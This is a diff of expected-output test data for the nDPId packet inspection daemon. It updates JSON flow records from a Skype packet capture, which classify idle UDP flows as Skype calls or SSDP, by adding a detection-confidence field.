-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.159","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.145","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.153","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.142","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":51066,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.160","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.172","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969713813,"flow_last_seen":1431969733946,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.26.55.167","src_port":13021,"dst_port":63773,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.162","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.154","src_port":13021,"dst_port":40005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.175","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.157","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.161","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.161","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.175","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969687504,"flow_last_seen":1431969687504,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.166","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.151","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.143","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.172","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.147","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
